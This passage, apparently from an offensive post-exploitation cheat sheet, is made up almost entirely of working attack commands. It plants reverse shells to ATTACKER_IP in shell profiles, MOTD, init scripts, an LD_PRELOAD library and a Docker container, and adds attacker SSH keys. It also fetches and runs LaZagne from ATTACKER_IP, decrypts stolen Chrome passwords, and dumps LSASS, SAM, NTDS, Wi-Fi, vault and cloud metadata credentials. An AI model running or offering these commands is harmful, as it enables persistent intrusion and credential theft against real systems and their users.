echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &' >> ~/.bash_profile
# System-wide profile
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &' | sudo tee -a /etc/profile
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &' | sudo tee -a /etc/bash.bashrc
# With conditional execution
echo 'if [ -z "$REVERSE_SHELL_LOADED" ]; then export REVERSE_SHELL_LOADED=1; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 & fi' >> ~/.bashrc
# === SSH KEYS ===
# Add SSH key to authorized_keys
mkdir -p ~/.ssh
echo 'ssh-ed25519 AAAAC3... attacker@kali' >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh
# Root SSH key
sudo mkdir -p /root/.ssh
echo 'ssh-ed25519 AAAAC3... attacker@kali' | sudo tee -a /root/.ssh/authorized_keys
sudo chmod 600 /root/.ssh/authorized_keys
# === MOTD (MESSAGE OF THE DAY) ===
# Update scripts (executed on SSH login)
echo '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &' | sudo tee /etc/update-motd.d/99-backdoor
sudo chmod +x /etc/update-motd.d/99-backdoor
# === PAM BACKDOOR ===
# Add PAM module
echo 'session optional pam_exec.so /tmp/payload.sh' | sudo tee -a /etc/pam.d/sshd
# === LD_PRELOAD ===
# Malicious shared library
cat > /tmp/evil.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))
void init() {
unsetenv("LD_PRELOAD");
if (fork() == 0) {
system("bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &");
}
}
EOF
gcc -fPIC -shared -o /tmp/evil.so /tmp/evil.c -nostartfiles
echo "/tmp/evil.so" | sudo tee -a /etc/ld.so.preload
# === PYTHON SITE-PACKAGES ===
# Startup script
sudo tee /usr/lib/python3/dist-packages/sitecustomize.py << 'EOF'
import subprocess
try:
subprocess.Popen(['bash', '-c', 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &'])
except:
pass
EOF
# === INIT.D (SYSV INIT) ===
# Init script
sudo tee /etc/init.d/backdoor << 'EOF'
#!/bin/bash
### BEGIN INIT INFO
# Provides: backdoor
# Required-Start: $network
# Required-Stop: $network
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Backdoor Service
### END INIT INFO
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &
EOF
sudo chmod +x /etc/init.d/backdoor
sudo update-rc.d backdoor defaults
# === DOCKER CONTAINER ===
# Persistent docker container
sudo docker run -d --restart always --name updater alpine sh -c 'while true; do nc ATTACKER_IP 4444 -e /bin/sh; sleep 60; done'
# === KERNEL MODULE ===
# Create kernel module (advanced)
# Requires kernel headers
cat > rootkit.c << 'EOF'
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
MODULE_LICENSE("GPL");
static int __init rootkit_init(void) {
printk(KERN_INFO "Module loaded\n");
return 0;
}
static void __exit rootkit_exit(void) {
printk(KERN_INFO "Module unloaded\n");
}
module_init(rootkit_init);
module_exit(rootkit_exit);
EOF
# Compile and load
make
sudo insmod rootkit.ko
echo "rootkit" | sudo tee -a /etc/modules
Data Exfiltration
#Browser Data Extraction#
# === CHROME DATA EXTRACTION ===
# Chrome passwords database
$ChromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default"
Copy-Item "$ChromePath\Login Data" "C:\Temp\chrome_passwords.db" -Force
# Chrome cookies
Copy-Item "$ChromePath\Cookies" "C:\Temp\chrome_cookies.db" -Force
Copy-Item "$ChromePath\Network\Cookies" "C:\Temp\chrome_network_cookies.db" -Force
# Chrome history
Copy-Item "$ChromePath\History" "C:\Temp\chrome_history.db" -Force
# Chrome bookmarks
Copy-Item "$ChromePath\Bookmarks" "C:\Temp\chrome_bookmarks.json" -Force
# Chrome credit cards
Copy-Item "$ChromePath\Web Data" "C:\Temp\chrome_webdata.db" -Force
# Chrome session data
Copy-Item "$ChromePath\Current Session" "C:\Temp\chrome_session" -Force
Copy-Item "$ChromePath\Current Tabs" "C:\Temp\chrome_tabs" -Force
# All Chrome profiles
Get-ChildItem "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data" -Directory | ForEach-Object {
$profile = $_.Name
if (Test-Path "$($_.FullName)\Login Data") {
Copy-Item "$($_.FullName)\Login Data" "C:\Temp\chrome_${profile}_passwords.db" -Force
}
}
# === FIREFOX DATA EXTRACTION ===
# Firefox profile path
$FirefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles"
# Copy all Firefox data
Get-ChildItem $FirefoxPath -Directory | ForEach-Object {
$profile = $_.Name
# Passwords
if (Test-Path "$($_.FullName)\logins.json") {
Copy-Item "$($_.FullName)\logins.json" "C:\Temp\firefox_${profile}_logins.json" -Force
}
# Key database
if (Test-Path "$($_.FullName)\key4.db") {
Copy-Item "$($_.FullName)\key4.db" "C:\Temp\firefox_${profile}_key4.db" -Force
}
# Cookies
if (Test-Path "$($_.FullName)\cookies.sqlite") {
Copy-Item "$($_.FullName)\cookies.sqlite" "C:\Temp\firefox_${profile}_cookies.db" -Force
}
# History
if (Test-Path "$($_.FullName)\places.sqlite") {
Copy-Item "$($_.FullName)\places.sqlite" "C:\Temp\firefox_${profile}_history.db" -Force
}
# Bookmarks (same as history in places.sqlite)
# Form history
if (Test-Path "$($_.FullName)\formhistory.sqlite") {
Copy-Item "$($_.FullName)\formhistory.sqlite" "C:\Temp\firefox_${profile}_forms.db" -Force
}
}
# === EDGE (CHROMIUM) DATA EXTRACTION ===
$EdgePath = "$env:USERPROFILE\AppData\Local\Microsoft\Edge\User Data\Default"
Copy-Item "$EdgePath\Login Data" "C:\Temp\edge_passwords.db" -Force
Copy-Item "$EdgePath\Cookies" "C:\Temp\edge_cookies.db" -Force
Copy-Item "$EdgePath\History" "C:\Temp\edge_history.db" -Force
Copy-Item "$EdgePath\Web Data" "C:\Temp\edge_webdata.db" -Force
# === BRAVE BROWSER ===
$BravePath = "$env:USERPROFILE\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default"
if (Test-Path $BravePath) {
Copy-Item "$BravePath\Login Data" "C:\Temp\brave_passwords.db" -Force
Copy-Item "$BravePath\Cookies" "C:\Temp\brave_cookies.db" -Force
}
# === OPERA ===
$OperaPath = "$env:APPDATA\Opera Software\Opera Stable"
if (Test-Path $OperaPath) {
Copy-Item "$OperaPath\Login Data" "C:\Temp\opera_passwords.db" -Force
Copy-Item "$OperaPath\Cookies" "C:\Temp\opera_cookies.db" -Force
}
# === BROWSER DATA WITH LAZAGNE ===
# Download and run LaZagne
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/laZagne.exe')
.\laZagne.exe browsers -oN
.\laZagne.exe all -oN # Extract all credentials
# Output to JSON
.\laZagne.exe all -oJ -output C:\Temp\
# === DECRYPT CHROME PASSWORDS (POWERSHELL) ===
Add-Type -AssemblyName System.Security
$ChromeDB = "C:\Temp\chrome_passwords.db"
$conn = New-Object System.Data.SQLite.SQLiteConnection("Data Source=$ChromeDB")
$conn.Open()
$cmd = $conn.CreateCommand()
$cmd.CommandText = "SELECT origin_url, username_value, password_value FROM logins"
$reader = $cmd.ExecuteReader()
while ($reader.Read()) {
$url = $reader["origin_url"]
$username = $reader["username_value"]
$encrypted = [byte[]]$reader["password_value"]
# Decrypt using DPAPI
try {
$decrypted = [System.Security.Cryptography.ProtectedData]::Unprotect($encrypted, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$password = [System.Text.Encoding]::UTF8.GetString($decrypted)
Write-Output "$url | $username | $password"
} catch {}
}
$conn.Close()
# === LINUX BROWSER DATA ===
# Chrome on Linux
cp ~/.config/google-chrome/Default/Login\ Data /tmp/chrome_passwords.db
cp ~/.config/google-chrome/Default/Cookies /tmp/chrome_cookies.db
cp ~/.config/google-chrome/Default/History /tmp/chrome_history.db
# Firefox on Linux
cp ~/.mozilla/firefox/*.default-release/logins.json /tmp/firefox_logins.json
cp ~/.mozilla/firefox/*.default-release/key4.db /tmp/firefox_key4.db
cp ~/.mozilla/firefox/*.default-release/cookies.sqlite /tmp/firefox_cookies.db
cp ~/.mozilla/firefox/*.default-release/places.sqlite /tmp/firefox_history.db
Database Extraction#
# === MYSQL/MARIADB ===
# Dump all databases
mysqldump -u root -p --all-databases > all_databases.sql
mysqldump -u root -p --all-databases --single-transaction --quick --lock-tables=false > all_databases.sql
# Dump specific database
mysqldump -u root -p database_name > database.sql
# Dump with extended insert (larger files, faster restore)
mysqldump -u root -p database_name --extended-insert > database.sql
# Dump structure only
mysqldump -u root -p database_name --no-data > structure.sql
# Dump data only
mysqldump -u root -p database_name --no-create-info > data.sql
# Dump specific tables
mysqldump -u root -p database_name table1 table2 > tables.sql
# Dump with compression
mysqldump -u root -p database_name | gzip > database.sql.gz
# Remote MySQL dump
mysqldump -h REMOTE_HOST -u user -p database_name > database.sql
# Export to CSV
mysql -u root -p -e "SELECT * FROM database.table INTO OUTFILE '/tmp/table.csv' FIELDS TERMINATED BY ',' ENCLOSED BY '\"' LINES TERMINATED BY '\n';"
# === POSTGRESQL ===
# Dump all databases
pg_dumpall -U postgres > all_databases.sql
# Dump specific database
pg_dump -U postgres database_name > database.sql
# Dump with compression
pg_dump -U postgres database_name | gzip > database.sql.gz
# Custom format (compressed by default)
pg_dump -U postgres -Fc database_name > database.dump
# Directory format (parallel dump)
pg_dump -U postgres -Fd database_name -f database_dump/ -j 4
# Dump specific schema
pg_dump -U postgres -n schema_name database_name > schema.sql
# Dump specific tables
pg_dump -U postgres -t table_name database_name > table.sql
# Plain text format with inserts
pg_dump -U postgres --column-inserts database_name > database.sql
# Export to CSV
psql -U postgres -d database_name -c "COPY table_name TO '/tmp/table.csv' WITH CSV HEADER"
# === MSSQL ===
# Backup database (SQL Server)
sqlcmd -S server -E -Q "BACKUP DATABASE [database] TO DISK = 'C:\Temp\database.bak'"
# With authentication
sqlcmd -S server -U sa -P password -Q "BACKUP DATABASE [database] TO DISK = 'C:\Temp\database.bak'"
# Script out database
sqlcmd -S server -E -Q "SELECT * FROM sys.tables" -o tables.txt
# Export to CSV
sqlcmd -S server -E -Q "SELECT * FROM database.dbo.table" -o output.csv -s"," -w 999
# PowerShell SQL backup
Invoke-Sqlcmd -ServerInstance "server" -Query "BACKUP DATABASE [database] TO DISK = 'C:\Temp\database.bak'"
# === SQLITE ===
# Dump entire database
sqlite3 database.db .dump > database.sql
# Dump specific table
sqlite3 database.db ".dump table_name" > table.sql
# Export to CSV
sqlite3 database.db <<EOF
.headers on
.mode csv
.output table.csv
SELECT * FROM table_name;
.quit
EOF
# Copy database file
cp database.db /tmp/database_backup.db
# === MONGODB ===
# Dump entire MongoDB
mongodump --out /tmp/mongodb_backup/
# Dump specific database
mongodump --db database_name --out /tmp/mongodb_backup/
# Dump specific collection
mongodump --db database_name --collection collection_name --out /tmp/mongodb_backup/
# With authentication
mongodump --username user --password pass --authenticationDatabase admin --out /tmp/mongodb_backup/
# Dump to archive
mongodump --archive=/tmp/database.archive --gzip
# Export to JSON
mongoexport --db database_name --collection collection_name --out /tmp/collection.json
# === REDIS ===
# Dump Redis data
redis-cli SAVE
cp /var/lib/redis/dump.rdb /tmp/redis_backup.rdb
# Export all keys
redis-cli --scan | while read key; do
echo "Key: $key"
redis-cli GET "$key"
done > /tmp/redis_dump.txt
# === ORACLE ===
# Data Pump export
expdp username/password@database DIRECTORY=dump_dir DUMPFILE=export.dmp LOGFILE=export.log
# Traditional export
exp username/password@database FILE=export.dmp LOG=export.log FULL=y
# === ELASTICSEARCH ===
# Snapshot entire cluster
curl -X PUT "localhost:9200/_snapshot/backup/snapshot_1?wait_for_completion=true"
# Export specific index
elasticdump --input=http://localhost:9200/index_name --output=/tmp/index.json
# === CASSANDRA ===
# Snapshot keyspace
nodetool snapshot keyspace_name
# Export to CSV
cqlsh -e "COPY keyspace.table TO '/tmp/table.csv' WITH HEADER = TRUE"
Memory Dump Analysis
## === WINDOWS MEMORY DUMP ===
# Using Sysinternals ProcDump
procdump.exe -ma lsass.exe lsass.dmp
# Dump specific process
procdump.exe -ma <PID> process.dmp
# Using Task Manager (GUI)
# Right-click process → Create dump file
# Using comsvcs.dll (built-in)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full
# PowerShell LSASS dump
$proc = Get-Process lsass
$dumpFile = "C:\Temp\lsass_$($proc.Id).dmp"
.\procdump64.exe -accepteula -ma $proc.Id $dumpFile
# === LINUX MEMORY DUMP ===
# Dump process memory
gcore <PID>
gcore -o output_file <PID>
# Dump all memory
dd if=/dev/mem of=/tmp/memory.dump bs=1M
cat /proc/kcore > /tmp/memory.dump
# Using LiME (Linux Memory Extractor)
sudo insmod lime-$(uname -r).ko "path=/tmp/memory.lime format=lime"
# Dump specific process memory
cat /proc/<PID>/maps
cat /proc/<PID>/mem > /tmp/process_memory.dump
# === VOLATILITY ANALYSIS (WINDOWS) ===
# Identify image info
volatility -f memory.dmp imageinfo
# List processes
volatility -f memory.dmp --profile=Win10x64 pslist
volatility -f memory.dmp --profile=Win10x64 psscan
volatility -f memory.dmp --profile=Win10x64 pstree
# Dump hashes
volatility -f memory.dmp --profile=Win10x64 hashdump
volatility -f memory.dmp --profile=Win10x64 lsadump
# Extract cached credentials
volatility -f memory.dmp --profile=Win10x64 cachedump
# Dump LSASS
volatility -f memory.dmp --profile=Win10x64 mimikatz
# Network connections
volatility -f memory.dmp --profile=Win10x64 netscan
volatility -f memory.dmp --profile=Win10x64 connections
# Command history
volatility -f memory.dmp --profile=Win10x64 cmdscan
volatility -f memory.dmp --profile=Win10x64 consoles
# Registry hives
volatility -f memory.dmp --profile=Win10x64 hivelist
volatility -f memory.dmp --profile=Win10x64 printkey -K "Software\Microsoft\Windows\CurrentVersion\Run"
# File extraction
volatility -f memory.dmp --profile=Win10x64 filescan | grep -i "interesting.txt"
volatility -f memory.dmp --profile=Win10x64 dumpfiles -Q 0xfffffa8001234567 -D output/
# === VOLATILITY ANALYSIS (LINUX) ===
# List processes
volatility -f memory.lime --profile=LinuxUbuntu2204x64 linux_pslist
volatility -f memory.lime --profile=LinuxUbuntu2204x64 linux_pstree
# Bash history
volatility -f memory.lime --profile=LinuxUbuntu2204x64 linux_bash
# Network connections
volatility -f memory.lime --profile=LinuxUbuntu2204x64 linux_netstat
# Loaded kernel modules
volatility -f memory.lime --profile=LinuxUbuntu2204x64 linux_lsmod
# Environment variables
volatility -f memory.lime --profile=LinuxUbuntu2204x64 linux_psenv
# === MIMIKATZ FROM MEMORY DUMP ===
# Using Mimikatz on dump file
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords
# === PYPYKATZ (PYTHON MIMIKATZ) ===
# Parse LSASS dump
pypykatz lsa minidump lsass.dmp
# Output to JSON
pypykatz lsa minidump lsass.dmp -o output.json
# Parse all
pypykatz lsa minidump lsass.dmp --json > credentials.json
Credential Harvesting
## === WINDOWS CREDENTIAL MANAGER ===
# List stored credentials
cmdkey /list
# Export credentials (requires DPAPI decryption)
$creds = Get-Content "$env:USERPROFILE\AppData\Local\Microsoft\Credentials\*" -Raw
$creds | Out-File C:\Temp\credentials.txt
# PowerShell Credential Manager
Get-StoredCredential | ForEach-Object {
"$($_.UserName) : $($_.Password)"
}
# === WINDOWS VAULT ===
# List vault items
vaultcmd /list
vaultcmd /listcreds:"Windows Credentials"
# PowerShell vault extraction
[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | ForEach-Object {
$_.RetrievePassword()
"Resource: $($_.Resource) | UserName: $($_.UserName) | Password: $($_.Password)"
}
# === SAVED WIFI PASSWORDS ===
# List profiles
netsh wlan show profiles
# Export specific profile
netsh wlan show profile name="SSID" key=clear
# Export all WiFi passwords
(netsh wlan show profiles) | Select-String "\:(.+)$" | ForEach-Object {
$name = $_.Matches.Groups[1].Value.Trim()
(netsh wlan show profile name=$name key=clear) | Select-String "Key Content\W+\:(.+)$" | ForEach-Object {
$pass = $_.Matches.Groups[1].Value.Trim()
"$name : $pass"
}
} | Out-File C:\Temp\wifi_passwords.txt
# === WINDOWS REGISTRY SECRETS ===
# Autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
# VNC passwords
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\RealVNC\WinVNC4" /s
# PuTTY sessions
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
# === SAM AND SYSTEM HIVES ===
# Copy SAM and SYSTEM
reg save HKLM\SAM C:\Temp\sam.hive
reg save HKLM\SYSTEM C:\Temp\system.hive
# Extract with secretsdump
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
# === NTDS.DIT EXTRACTION ===
# Using ntdsutil (requires DA privileges)
ntdsutil "activate instance ntds" "ifm" "create full C:\Temp\ntds" quit quit
# Copy NTDS.dit using VSS
wmic shadowcopy call create Volume='C:\'
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Temp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\SYSTEM
# Extract hashes
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
# === LINUX CREDENTIAL FILES ===
# Shadow file
sudo cat /etc/shadow > /tmp/shadow.txt
# Passwd file
cat /etc/passwd > /tmp/passwd.txt
# SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_ed25519" 2>/dev/null
find /home -name "authorized_keys" 2>/dev/null
# Copy all SSH keys
find /home -name "id_*" -exec cp {} /tmp/ \; 2>/dev/null
find /root/.ssh -type f -exec cp {} /tmp/ \; 2>/dev/null
# Bash history (passwords in commands)
find /home -name ".bash_history" -exec grep -i "pass\|pwd\|password" {} \; 2>/dev/null
# Configuration files with passwords
grep -r "password\|pass\|pwd" /etc/ 2>/dev/null
grep -r "mysql.*password" /var/www/ 2>/dev/null
# Database config files
cat /var/www/html/wp-config.php 2>/dev/null
cat /var/www/html/config.php 2>/dev/null
# === APPLICATION CREDENTIALS ===
# FileZilla
copy "$env:APPDATA\FileZilla\recentservers.xml" C:\Temp\
copy "$env:APPDATA\FileZilla\sitemanager.xml" C:\Temp\
# WinSCP
reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s > C:\Temp\winscp.txt
# RDP saved credentials
cmdkey /list | findstr "TERMSRV"
# Outlook
copy "$env:APPDATA\Microsoft\Outlook\*.pst" C:\Temp\
# KeePass
Get-ChildItem -Path C:\ -Filter "*.kdbx" -Recurse -ErrorAction SilentlyContinue
# 1Password
copy "$env:LOCALAPPDATA\1Password\data" C:\Temp\ -Recurse
# LastPass
copy "$env:LOCALAPPDATA\LastPass" C:\Temp\ -Recurse
Cloud Credentials
## === AWS CREDENTIALS ===
# AWS credentials file
cat ~/.aws/credentials
cat ~/.aws/config
# Windows
type %USERPROFILE%\.aws\credentials
type %USERPROFILE%\.aws\config
# EC2 instance metadata
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
# IMDSv2
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Environment variables
echo $AWS_ACCESS_KEY_ID
echo $AWS_SECRET_ACCESS_KEY
echo $AWS_SESSION_TOKEN
# === AZURE CREDENTIALS ===
# Azure credentials file
cat ~/.azure/credentials
cat ~/.azure/config
# Azure VM metadata
curl -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# Get access token
curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# Azure DevOps PAT
cat ~/.azure-devops/pat.txt
# === GCP CREDENTIALS ===
# GCP credentials
cat ~/.config/gcloud/credentials.db
cat ~/.config/gcloud/application_default_credentials.json
# GCE metadata
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" -H "Metadata-Flavor: Google"
# Get access token
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
# Service account email
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" -H "Metadata-Flavor: Google"
# === DOCKER CREDENTIALS ===
# Docker config
cat ~/.docker/config.json
# Windows
type %USERPROFILE%\.docker\config.json
# Docker secrets (if mounted)
ls /run/secrets/
cat /run/secrets/*
# === KUBERNETES SECRETS ===
# Kubeconfig
cat ~/.kube/config
# Service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# Extract all secrets from cluster
kubectl get secrets --all-namespaces -o json > /tmp/k8s_secrets.json
# === TERRAFORM SECRETS ===
# Terraform state files (often contain credentials)
find . -name "terraform.tfstate" -exec cat {} \;
find . -name "*.tfstate" -exec grep -i "password\|secret\|token" {} \;
# === ANSIBLE VAULT ===
# Ansible vault files
find . -name "vault.yml"
find . -name "*vault*"
# If password known
ansible-vault decrypt vault.yml --output=/tmp/decrypted.yml
# === GIT CREDENTIALS ===
# Git credentials
cat ~/.git-credentials
cat ~/.gitconfig
# Git credential cache
git config --get credential.helper
# Search for secrets in git history
git log --all --full-history --source --find-object=$(git hash-object file.txt)